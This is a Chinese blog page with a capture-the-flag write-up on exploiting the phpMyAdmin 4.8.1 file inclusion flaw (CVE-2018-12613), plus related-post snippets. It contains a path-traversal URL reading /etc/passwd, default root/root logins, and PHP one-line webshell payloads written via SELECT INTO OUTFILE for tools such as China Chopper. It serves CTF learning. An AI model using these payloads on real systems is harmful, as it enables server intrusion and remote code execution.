墨者学院CTF(phpMyAdmin后台文件包含分析溯源)

最新推荐文章于 2024-01-26 08:46:38 发布
最新推荐文章于 2024-01-26 08:46:38 发布
阅读量3.1k 收藏 4
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38963246/article/details/100737172
版权

墨者学院CTF(phpMyAdmin后台文件包含分析溯源)

靶场地址:
http://219.153.49.228:45122/
相关知识:

1.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
2.php代码审计
3.base64编码绕过

思路: 利用过滤规则绕过php文件包含的黑白名单限制,再利用php的session会话机制,包含一句话木马文件获取shell。
获取key(弱口令登录就省了root/root):

1.构造绕过白名单的url:http://219.153.49.228:45122/index.php?target=db_sql.php%253f/…/…/…/…/…/etc/passwd
测试结果,成功:在这里插入图片描述
2.执行SQL查询,写入一句话木马,此时由于php的session会话机制会把文件写入到服务器session的文件。
常见session文件的保存目录:
/var/lib/php/sess_PHPSESSID
/var/lib/php/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID
①.写入一句话木马

最低0.47元/天 解锁文章
phpmyadmin 文件包含(CVE-2014-8959)
千寻的博客
03-07 1916
- CNNVD编号:`CNNVD-201411-417 ` - 危害等级:` 中危 ` - CVE编号:` CVE-2014-8959 ` - 漏洞类型: `路径遍历 ` - 发布时间:` 2014-11-24 ` - 威胁类型: `远程 `
墨者学院-phpMyAdmin后台文件包含分析溯源
qq_47094508的博客
07-01 1429
首先拿到题目到点击访问访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器账户密码:root root点击sql模块 对sql语句进行一个查询首先查询sql写一句话的权限我们可以看到他的值为空secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/ 接下来确认一下mysql权限,可以看到这里是最高权限r
0x01.phpMyAdmin后台文件包含分析溯源
qq_31679787的博客
09-11 1004
登录界面; phpmyadmin的默认账户名密码是root/空,或者是root/root,尝试后发现是root/root; 通过打开新的phpmyadmin窗口,发现所有参数; 根据cve-2018-12613漏洞可以得到网站根目录/var/www/html; 首先select '<?php phpinfo();?>';然后通过payload构造文件包含; payl...
墨者学院10 phpMyAdmin后台文件包含分析溯源
weixin_42789937的博客
02-12 594
墨者学院10 phpMyAdmin后台文件包含分析溯源,本文整理了评论区的三种解法,解题过程七分靠技术,三分靠运气~
phpmyadmin文件包含
热门推荐
vergilben的学习日记
04-03 1万+
CVE-2018-12613 — 本地文件包含造成远程代码执行漏洞复现,其实就是我们常见的LFI漏洞。在我前面写的博客里面又详细介绍。这次我们直接进入墨者学院进行复现,不再自行搭建环境。 进入环境 这里使用弱口令进入,账号root,密码root。 进入之后页面如下: 执行sql语句挂入一句话木马 进入SQL执行页面 点击执行。 使用中国菜刀连接服务器 在根目录下我们发现key.txt文件,...
墨者学院——phpMyAdmin后台文件包含分析溯源
知足且坚定,温柔且上进
02-09 599
此题利用一句话木马 进入登陆界面,用burpsuite爆破得到username与password都为:root 进入SQL界面,输入一句话木马(密码为leo),点击“执行”: select "<?php eval($_post[leo]);?>" into outfile "/var/www/html/3.php" 此时打开蚁剑(注意:url后面记得跟上一句话木马目标的页面3....
phpMyAdmin后台文件包含分析溯源(CVE-2018-12613)--墨者学院
小白鸽
08-03 888
01 背景介绍 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 02 影响版本 phpMyAdmin 4.8.0和4.8.1 03 利用方式 1.写phpinfo文件,利用文件包含,查看绝对路径, select '<?php phpinfo()?>' 2.写小马 select '<?ph
墨者学院---phpMyAdmin后台文件包含分析溯源--解题思路
weixin_43071873的博客
08-27 622
进入后台,使用弱口令尝试登入 如admin~admin,root-root等 本题为root-root 点到SQL,发现可以进行sql语句 select ‘<?php eval($_POST[giao]);?>’ into outfile ‘/var/www/html/2.php’ 3.执行成功 4.上菜刀 5.在根目录可以找到本题所需要的key 在www/html目录中可以找到写入的一句话木马 ...
07#墨者靶场-phpMyAdmin后台文件包含分析溯源
shy的博客
11-22 1618
墨者学习 By/shy014 地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 1.在墨者学院找到...
phpmyadmin文件包含漏洞复现(CVE-2018-12613)
feng的博客
05-04 1261
前言 一个非常经典的漏洞了,以前只是直接拿payload打,还没认真的在本地复现过,看过漏洞的代码到底是怎么回事,所以今天从github上下载phpmyadmin4.8.1,到vps上然后复现一波,看一下代码的问题。 复现 漏洞出现在index.php的第61行: 存在任意文件包含,但是需要进入if才可以。 一层一层的来看,首先target不为空,而且是字符串,这很容易满足,而且不以index开头,而且不在黑名单中: $target_blacklist = array ( 'import.php'
phpmyadmin-文件包含(CVE-2014-8959)
m0_65150886的博客
01-02 781
其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。用户名密码登陆pmatest/pmatest (phpMyAdmin)1.已知MySQL用户名和密码登录到phpmyadmin。3、包含根目录下1.gif等恶意文件。2.需要截断漏洞配合才能任意包含。构造URL,成功执行文件包含。1.访问ip:port。
Phpmyadmin文件包含漏洞(CVE-2018-12613)
jammny
11-28 367
漏洞简介 index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。该漏洞需要登录进phpmyadmin页面才能利用。 漏洞影响 phpMyAdmin 4.8.0、4.8.1版本 漏洞分析 https://blog.youkuaiyun.com/qq_33020901/article/details/80829269 漏洞利用 访问存在漏洞版本的页面 payload构造如下: http://192.168.30.128:8080/index.php?target=d
phpmyadmin-文件包含漏洞代码审计过程(超详细)
qq_59020256的博客
01-26 1648
phpmyadmin-文件包含漏洞。
phpmyadmin文件包含漏洞
Hydra的博客
10-21 1026
http://139.199.31.116:9008/index.php?target=db_sql.php%253f/../../../../../../flag.txt  
phpmyadmin漏洞_方兴未艾第3期 | phpMyAdmin文件包含漏洞
weixin_39884144的博客
11-30 252
phpMyAdmin文件包含漏洞Created 2020-07-22|Updated 2020-07-2201前言1.1CVE-2018-12613(phpMyAdmin文件包含漏洞)phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含漏洞,通过二次编码即可绕过检查1.2文件包含漏洞文件包含漏洞分为 本地文件包含(LFI) 和 ...
墨者学院phpMyAdmin后台文件包含分析溯源
最新发布
12-28
### PHPMyAdmin 文件包含漏洞分析溯源 #### 背景介绍 PHPMyAdmin 是一款广泛使用的 MySQL 数据库管理工具,允许管理员通过 Web 界面执行各种数据库操作。然而,在某些版本中存在安全漏洞,可能导致远程攻击者利用这些漏洞执行任意代码或读取敏感文件。 #### 漏洞详情 该漏洞存在于特定条件下未正确验证用户输入的情况下,使得攻击者能够绕过正常的安全检查机制并触发文件包含行为。具体来说: - 攻击者可以通过构造恶意请求来操纵 `$target` 变量的值[^1]。 - 如果目标参数不是 `import.php` 或 `export.php` ,则可能被成功利用[^3]。 #### 利用过程解析 当拥有足够的权限以及知道服务器上的绝对路径时,攻击者可以尝试向指定位置写入恶意脚本。例如: ```sql SELECT '<?php phpinfo(); ?>' INTO OUTFILE '/var/lib/mysql/test.php'; ``` 这段 SQL 语句会创建一个新的 PHP 文件 `/var/lib/mysql/test.php` 并将其内容设置为调用 `phpinfo()` 函数的结果[^2]。 #### 风险评估 一旦上述命令被执行,任何访问此新生成 `.php` 文件的人都能看到当前环境配置信息,这不仅泄露了重要的系统细节还为进一步渗透提供了便利条件。 为了防止此类事件的发生,建议及时更新至最新稳定版次,并遵循最小化授权原则严格控制对关键资源的操作权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值